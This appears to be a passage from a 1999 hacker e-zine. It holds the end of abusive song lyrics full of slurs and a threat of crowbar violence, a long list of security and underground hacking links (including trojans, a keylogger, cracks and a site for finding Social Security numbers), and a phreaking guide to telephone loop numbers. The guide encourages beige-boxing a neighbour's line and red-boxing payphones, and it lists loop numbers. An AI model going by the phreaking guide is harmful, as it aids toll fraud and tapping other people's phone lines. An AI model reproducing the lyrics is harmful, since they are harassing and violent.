There's no chance he'll ever bang her
(He never ever gets da pussy)
JP shut up
(Piece of shit whore)
You piece of shit whore
(I know a piece of shit media whore)
You piece of shit whore
(Piece of shit whore)
And you call us liars
(You're a piece of shit whore)
Look in the fucking mirror
(Piece of shit whore)
You'll be seven different colors
(You piece of shit media whore)
Fucking crowbar into your lap
(Piece of shit whore)
You'll be puking eve-ry-where
(You're a piece of shit whore)
(Piece of shit whore)
(You're a piece of shit whore)
(Piece of shit whore)
The whole world thinks your a loser
(You're a piece of shit whore)
Maybe I'll give you a push
(Piece of shit whore...)
[-------------------------------------]
kv[13]; /* Top WWW Sites......................................ntwak0 */
LOU Fast Handy Links
NtWaK0 June 06, 1999
Hello to all my brothers and sisters -;).
This time I decide to make some diffrent and handy and that can help
everyone. A novie or ereet person. After years of experience in
computing field I did find out that if we have nice organized
idea/file/links/whatever/you/want, well we do our job better and
faster and less stress >>less Coffee.
So I decided to put out a nice list that contain security information.
I will be keeping this up-to-date and the plan is to have a nice small
HTML format file that can be used any where you go just dump it on
diskette or what ever you like.
Sorry for the list I wished I could make it bigger but I had time
restriction. Let IT GROW. ;)
I could make the links on different files, but I wanted to have
something on one file. So your suggestion are more then welcome.
Shout-out to all LOU members /friends.
1. Security
2. Tools
3. Search
4. News
Security
* Information
+ http://csrc.nist.gov/secpubs/rainbow
È See document: http://csrc.nist.gov/secpubs/rainbow
+ Canadian gov information
È See document: http://csrc.nist.gov/nistpubs/cc/
+ Electronically OK!
È See document: http://eok.net/
+ http://gandalf.isu.edu/security/security.html
È See document: http://gandalf.isu.edu/security/security.html
+ firewall-wizards messages
È See document: http://www.nfr.net/firewall-wizards/
+ http://www.iss.net/xforce/
È See document: http://www.iss.net/xforce/
+ CIAC Bulletins
È See document: http://ciac.llnl.gov/ciac/
+ Tips of the month
È See document: http://199.44.114.223/rharri/tips.htm
+ http://www.warforge.com/
È See document: http://www.warforge.com/
+ NT security
È See document:
http://www.txdirect.net/users/wall/ntlinks.htm
+ http://www.fedz.net/
È See document: http://www.fedz.net/
+ http://www.daxion.demon.co.uk/
È See document: http://www.daxion.demon.co.uk/
+ http://www.infilsec.com/
È See document: http://www.infilsec.com/
+ http://gandalf.isu.edu/
È See document: http://gandalf.isu.edu/
+ http://www.nfr.net/
È See document: http://www.nfr.net/
+ http://www.iss.net/xforce/
È See document: http://www.iss.net/xforce/
+ Security Links UNIX NT etc...
È See document:
http://www.ntsecurity.net/scripts/loader.asp?iD=/security/nt
resources.htm
+ Computers Security information
È See document: http://www.alw.nih.gov/Security/security.html
+ COAST Hotlist kudos
È See document: http://www.cs.purdue.edu/coast/hotlist/
+ Computer Security Resource Clearinghouse
È See document: http://csrc.ncsl.nist.gov/
+ Computer Incident Advisory Capability
È See document: http://ciac.llnl.gov/
+ NT FAQ
È See document: http://www.ntfaq.com/
+ NT Download Zdnet Site
È See document:
http://www.zdnet.com/windows/nt/security/ntbugtraq/
+ http://www.trustedsystems.com/
È See document: http://www.trustedsystems.com/
+ http://www.infowar.com/
È See document: http://www.infowar.com/
+ http://www.securezone.com/
È See document: http://www.securezone.com/
+ Computers Consulting Links
È See document: http://www.ahandyguide.com/cat1/c/c1305.htm
+ http://www.ntresearch.com/
È See document: http://www.ntresearch.com/
+ NT Admin Tools
È See document: http://www.ntadmintools.com/
+ New dimension security Trainning
È See document: http://www.newdimensions.net
+ Statistics
o http://nic.merit.edu:/nsfnet/statistics/
È See document: http://nic.merit.edu:/nsfnet/statistics/
o http://www.hack.gr/cgi-bin/webstats
È See document: http://www.hack.gr/cgi-bin/webstats
o Get a live Internet Traffic Report
È See document: http://www.internettrafficreport.com/
o Web Statistics
È See document: http://www.hack.gr/cgi-bin/webstats
o Crime Security Systems
È See document: http://www.crime-freesecurity.com/
+ Unix
o http://www.users.fast.net/
È See document: http://www.users.fast.net/
o http://w56.ml.org/
È See document: http://w56.ml.org/
* App
+ WatchDog Software (unix)
È See document: http://www.infstream.com/
+ Reporting Software
È See document: http://www.notify.com/audit.htm
+ Netsuite Professional Audit Sotware
È See document:
http://www.netsuite.com/cgi/template.pl/site/products/index.
html
+ NDG Software's
È See document: http://www.comsecltd.com/archive/ndgfile.html
+ aelita enterprise suite
È See document: http://www.ntsecurity.com/Products/index.html
+ SeNTry - the Enterprise Event Manager
È See document:
http://www.missioncritical.com/product/list.htm
+ The MerzScope Sampler
È See document: http://www.merzcom.com/prod/scop/sampler.html
+ Hackershield
È See document:
https://secure.interlog.com/netect/hsblform.htm
+ T-sight
È See document:
http://www.engarde.com/software/t-sight/index.html
+ NTManage v2.08
È See document: http://www.lanware.net/download/
+ Forensic and Security Software
È See document: http://www.secure-data.com/tools.html
+ Site Manager Software
È See document:
http://194.87.208.92/product/bay/network/site.htm
+ RealSecure Software
È See document: http://www.iss.net/prod/rs.html
+ Shadoware - Real-Time Network Security Monitoring
È See document: http://www.intrusion.com
+ Kane Security Analyst Software
È See document: http://www.intrusion.com/product.htm
[ruler.gif]
Tools
* Vulnerability Track
+ http://www.ntsecurity.net/
È See document: http://www.ntsecurity.net/
+ http://www.geek-girl.com/bugtraq/search.html
È See document: http://www.geek-girl.com/bugtraq/search.html
+ http://www.cert.org/
È See document: http://www.cert.org/
+ http://www.insecure.org/
È See document: http://www.insecure.org/
+ http://www.iss.net/xforce/
È See document: http://www.iss.net/xforce/
+ Exploit Track
È See document: http://www.geek-girl.com/bugtraq/search.html
+ Vulnerability engine
È See document:
http://www.infilsec.com/cgi-infilsec/if?action=search?
* Crackz
+ http://bmh.underboss.com/cracks.html
È See document: http://bmh.underboss.com/cracks.html
* Registry
+ NT Registry Hack
È See document: http://www.jsiinc.com/reghack.htm
+ Registry Tips Very Good
È See document:
http://www.regedit.com/Security/Restrictions_and_Policies/
+ Win 95 Reg Hack
È See document:
http://www.cnet.com/Content/Features/Howto/Hacks/index.html
* OnLine Tools
+ Hacker Home Page
È See document: http://www.cyberarmy.com/
+ Nice serach for Hackers
È See document: http://ww2.hitbox.com/
+ Get NT user and Group List Using IE
È See document: http://209.146.229.2/NTSecurity/default.asp
+ FTP Fast
È See document: http://ftpsearch.ntnu.no/
+ Find People anywhere
È See document: http://www.worldpages.com/reshome.html/
+ Get a social number USA
È See document: http://kadima.com/
+ World Page
È See document: http://www.worldpages.com
+ Search for Any domain
È See document: http://www.alldomains.com/
+ Whois Server
o telnet://whois.internic.net/
È See document: telnet://whois.internic.net/
o telnet://nic.ddn.mil 43
È See document: telnet://nic.ddn.mil 43
+ Word list all lang
È See document: ftp://sable.ox.ac.uk/pub/wordlists
+ Nameserver Lookup
È See document:
http://jos.net/projects/nslookup4WWW/nslookup4WWW.html
* List 1
+ http://www.fortrex.com/trn_hacker_tools.htm
È See document: http://www.fortrex.com/trn_hacker_tools.htm
+ Windows NT Web Server Tools
È See document: http://www.interlacken.com/winnt/ntwebsrv.htm
+ Information Security Resource
È See document: http://www.sabernet.net/
+ Script page
È See document: http://worldwidemart.com/scripts/
+ http://www.hackersclub.com/km/library
È See document: http://www.hackersclub.com/km/library
+ http://www.apbonline.com/gfiles/
È See document: http://www.apbonline.com/gfiles/
+ http://www.jabukie.com/
È See document: http://www.jabukie.com/
+ Hackers Hall Of Fame
È See document:
http://eagle2.online.discovery.com/area/technology/hackers/h
ackers.html
+ http://www.thecodex.com/hacking.html
È See document: http://www.thecodex.com/hacking.html
+ http://www.sysone.demon.co.uk/newhack.htm
È See document: http://www.sysone.demon.co.uk/newhack.htm
+ http://www.bikkel.com/~demoniz/
È See document: http://www.bikkel.com/~demoniz/
+ Team 2600 MAC Hacking
È See document: http://cyberpunkz.com/team2600/products.html
+ Stealth Keyboard Interceptor
È See document:
http://www.fortunecity.com/skyscraper/cache/426/key_log.html
+ Snadboy's Revelation
È See document: http://www.snadboy.com/Revelation.shtml
+ SATAN Unix
È See document: http://www.cs.ruu.nl/cert-uu/satan.html
+ L0pht Crack
È See document: http://www.l0pht.com/l0phtcrack/
+ IP Spoofing
È See document: http://ryanspc.com/ipspoof.html
+ Trojan Like Bo
È See document: http://hax0r.to/deept/
+ Back Orifice
È See document: http://www.cultdeadcow.com/tools/
+ Collection of hacking CDROM
È See document: http://www.hackershomepage.com/section7.htm
+ Hacking CD
È See document: http://members.xoom.com/hackingcd/smallcd.htm
+ Hacker Gold CDROM
È See document: http://www.hackerscatalog.com/hackgold.htm
+ Hackershield
È See document:
https://secure.interlog.com/netect/hsblform.htm
+ http://ds.dial.pipex.com/legends/
È See document: http://ds.dial.pipex.com/legends/
+ United Hackers Association
È See document: http://205.237.55.207/
+ http://www.hackcanada.com/
È See document: http://www.hackcanada.com/
+ http://rhino9.ml.org/
È See document: http://rhino9.ml.org/
+ http://www.genocide2600.com/~tattooman/ADM/
È See document: http://www.genocide2600.com/~tattooman/ADM/
+ http://www.insecure.org/nmap/
È See document: http://www.insecure.org/nmap/
+ http://bewoner.dma.be/clan/
È See document: http://bewoner.dma.be/clan/
+ Linux Project Personal Page Check Often
È See document: http://www.cri.cz/kra/index.html
+ Hacking NT Tools
È See document: http://www.kull.ch/Bauersachs/cracknt_e.asp
+ tHe w1ck3d k1nGs
È See document: http://members.xoom.com/SOSSEC/frames.html
+ The United Council
È See document: http://www.unitedcouncil.org/
+ Hacking Tools & Virus
È See document: http://home.bip.net/ttorp/enter.html
+ Hacker Club
È See document: http://hackersclub.com/km/files/
+ Hide Away
È See document: http://www.hideaway.net/
+ http://underground.org
È See document: http://underground.org
+ http://www.phrack.com
È See document: http://www.phrack.com
+ http://www.subz3ro.com/
È See document: http://www.subz3ro.com/
+ 901 check in the future
È See document: http://www.901.org/files.html
+ Good site must check often
È See document:
http://www.fortunecity.com/skyscraper/quantum/488/KiNdReD.ht
ml
+ Check Often Phreak and Hack
È See document: http://www.johnhead.demon.nl/frames.htm
+ WebFringe Hacker Web Links
È See document: http://www.webfringe.com/top100/?progen
+ Microsoft hack files
È See document: ftp://ftp.technotronic.com/microsoft/
+ http://www.2600.com/beyondhope/
È See document: http://www.2600.com/beyondhope/
+ http://www.brd.ie/papers/
È See document: http://www.brd.ie/papers/
+ Magazine
2600
Underground Informer
+ Unix
http://www.squirrel.com/squirrel/index.html
http://www.users.fast.net/
* List 2
+ http://www.chez.com/rekcah/
È See document: http://www.chez.com/rekcah/
+ http://www.altern.org/snem1/frames/
È See document: http://www.altern.org/snem1/frames/
+ http://www.hackersntrackers.com/
È See document: http://www.hackersntrackers.com/
+ http://membres.tripod.fr/Hackito/Newtaz.html
È See document: http://membres.tripod.fr/Hackito/Newtaz.html
+ Active Matrix's Hideaway
È See document: http://www.hideaway.net/
+ http://www.clic.net/~hello/puppet/
È See document: http://www.clic.net/~hello/puppet/
* Exploits and Search
+ http://www.geek-girl.com/bugtraq/search.html
È See document: http://www.geek-girl.com/bugtraq/search.html
+ http://www.genocide2600.com/~tattooman/index.shtml
È See document:
http://www.genocide2600.com/~tattooman/index.shtml
+ http://www.pulhas.org/exploits/
È See document: http://www.pulhas.org/exploits/
+ http://www.hackcity.com/
È See document: http://www.hackcity.com/
+ http://www.real-secure.org/security/exploits/
È See document: http://www.real-secure.org/security/exploits/
+ http://www.antioffline.com/
È See document: http://www.antioffline.com/
+ http://www.macroshaft.org/noie.html
È See document: http://www.macroshaft.org/noie.html
+ http://www.securitysearch.net/
È See document: http://www.securitysearch.net/
+ http://adm.freelsd.net/
È See document: http://adm.freelsd.net/
+ http://www.undersec.com/
È See document: http://www.undersec.com/
+ http://www.raza-mexicana.org
È See document: http://www.raza-mexicana.org
+ http://www.arctik.com
È See document: http://www.arctik.com
+ http://personales.mundivia.es/sneaker
È See document: http://personales.mundivia.es/sneaker
+ http://homocyberian.cjb.net
È See document: http://homocyberian.cjb.net
+ http://719.cjb.net
È See document: http://719.cjb.net
+ http://www.sekure.org/english/index.html
È See document: http://www.sekure.org/english/index.html
+ http://www.cybermedia.co.in/hotnews.htm
È See document: http://www.cybermedia.co.in/hotnews.htm
+ http://www.securiteam.com/
È See document: http://www.securiteam.com/
+ http://www.ntsecurity.net/
È See document: http://www.ntsecurity.net/
+ http://www.networkcommand.com/
È See document: http://www.networkcommand.com/
+ http://www.attrition.org/errata/
È See document: http://www.attrition.org/errata/
+ http://www.ciac.org/
È See document: http://www.ciac.org/
+ http://www.eeye.com/index.html
È See document: http://www.eeye.com/index.html
+ http://www.alternetive.asso.fr/securite/securiteSoft.htm
È See document:
http://www.alternetive.asso.fr/securite/securiteSoft.htm
+ http://www.insecure.org/
È See document: http://www.insecure.org/
+ http://www.iss.net/xforce/
È See document: http://www.iss.net/xforce/
+ http://www.infilsec.com/cgi-infilsec/if?action=search?
È See document:
http://www.infilsec.com/cgi-infilsec/if?action=search?
+ http://www.nmrc.org/
È See document: http://www.nmrc.org/
+ http://www.technotronic.com/
È See document: http://www.technotronic.com/
+ http://www.cookiecentral.com/
È See document: http://www.cookiecentral.com/
[ruler.gif]
Search
* Altavista
È See document: http://altavista.digital.com/
* Altavista Translator
È See document: http://babelfish.altavista.digital.com/
* HotBot
È See document: http://hotbot.com
* DogPile
È See document: http://www.dogpile.com/
* 12 Serach Engine In One
È See document: http://www.800go.com/800go.html
* Deja News
È See document: http://www.dejanews.com/
* Handilinks
È See document: http://www.handilinks.com/
* Find People Kadima
È See document: http://kadima.com/
* World Yellow Pages
È See document: http://www.worldpages.com/reshome.html/
* World Yellow Pages
È See document: http://www.worldpages.com
* http://www.800go.com/800go.html
È See document: http://www.800go.com/800go.html
* Support Microsoft
È See document: http://support.microsoft.com/support/search/c.asp?
* Security Serach Engine
È See document: http://www.securitysearch.net/
* Country
+ Canada 411
È See document: http://canada411.sympatico.ca/index.html
+ St-Bruno
È See document: http://www.pageweb.qc.ca/st-bruno/default.htm
[ruler.gif]
News
* http://www.hackernews.com/
È See document: http://www.hackernews.com/
* http://www.infowar.com/hacker/hacker.html-ssi
È See document: http://www.infowar.com/hacker/hacker.html-ssi
* Hacked SiteArchives of hacked sites
È See document: http://www.onething.com/archive/
* New Dimension archive hacked
È See document: http://www.newdimensions.net/hacktrash.htm
* AntiOnline archive of hacked
È See document: http://www.antionline.com/archives/pages/
* http://www.wired.com/
È See document: http://www.wired.com/
* http://innerpulse.com/
È See document: http://innerpulse.com/
* www.innerpulsewwwboard.com
È See document: http://www.innerpulsewwwboard.com
* http://www.innerpulsehacks.com
È See document: http://www.innerpulsehacks.com
* News Group
+ news://alt.security
È See document: news://alt.security
+ news://comp.security.announce
È See document: news://comp.security.announce
+ List of Security List Servers
È See document: ListServer.htm
* Magazine
+ Virus 40HEX
È See document: http://www.eff.org/pub/Publications/CuD/
+ Safer Magazine
È See document: http://www.siamrelay.com/
* Dokumentation des Chaos
È See document: http://presse.ccc.de/
* http://www.sans.org/digest.htm
È See document: http://www.sans.org/digest.htm
[-------------------------------------]
kv[14]; /* Intro to Loops.....................................hitman */
$Intro.$
Loop numbers can be found in all area codes and are made up primarily of
two phone numbers which are usually consectitive.
ex;
201-376-9929 201-376-9930
(actual working loop number in NJ)
The two numbers are connected and have a constant on hook voltage. If you
called the lower number and your buddy phreak called the higher number you
would be instantly connected! Sorta like a conference table.(which mah
boy error explains about it in a issue of A9F4) Any way you will know if
you are on one of the two is if you either hear silence or a loud
tone.(100hz)This is the low number,(through dozens of tests) if you hear
a low beep then you on the higher number.
$The Fun Begins...$
I know by know you are wondering what the hell you need a loop number for
or how to find one for if not you wouldn't be reading this txt. Having a
loop number is one of the numbero uno things a field phreak can have next
to a beige/red box. It can offer even more anonymity while talking on the
phone.
For example, you can either beige box your neighbors TNI or beige box the
splice box around the corner and dial one of the numbers and talk to your
waiting friend and/or red box a payphone and dial,etc. This is one of the
greatest things to have if you want to talk to someone other than an at&t
conference number.
You can also place charges on the loop.Say for instance you get on a conf.
or maybe the operator asks where should you place the charges. Have your
friend be on the loop and tell her the number. Maybe not a good idea but
wtf.
It is very simple but painstakingly hard to scan for loops. One of my
tricks is to enter one of your town/cities normal prefixes and then add
99xx/99xX. I got around 5 or 6 out of probably 20 attempts. I'm not too
sure of the risks of scanning for loops,plus Bell hasn't mailed me
anything yet so i guess its okay. Just don't be dialing all day. Do a few
at a time. Just dial three or four random numbers per day and you can make
up a wrong number or/me no speak no english story.
$In the End...$
Loop numbers can be very fun and useful to anyone who wants the extra
stealth when talking about upcoming projects or meetings and the such.But
it also has its drawbacks like trying to find Loop Numbers. So i decided
to put in a few loop numbers in here from a few npas around the country.
Some may work and some may not.
That's life,dig it.
*****Loop List*****
California
213-360-1118 $ 213-365-1118
213-360-1119 $ 213-365-1119
Florida
305-964-9951 $ 305-778-9952
305-778-9951 $ 305-964-9952
Michigan
313-731-9996 $ 313-722-9996
313-731-9997 $ 313-722-9997
New Jersey
201-558-9929 $ 201-992-9929
201-558-9930 $ 201-992-9930
*****Loop List*****
[----------thats all folks-------]
http://www.underzine.com - An LoU joint..... [www.legions.org]